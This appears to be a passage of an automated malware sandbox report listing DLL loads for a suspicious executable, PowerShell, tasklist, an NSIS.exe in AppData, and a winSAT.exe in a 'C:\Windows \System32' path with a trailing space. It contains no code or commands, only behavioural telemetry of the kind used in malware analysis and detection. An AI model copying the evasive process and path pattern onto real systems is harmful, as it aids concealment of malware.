Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: version.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: winmm.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: dxgi.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10_1.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: version.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10_1core.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10core.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d11.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d11.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: ntmarta.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: windows.storage.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: version.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: winmm.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: dxgi.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10_1.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10_1core.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d11.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10core.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d11.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: version.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: ntmarta.dll
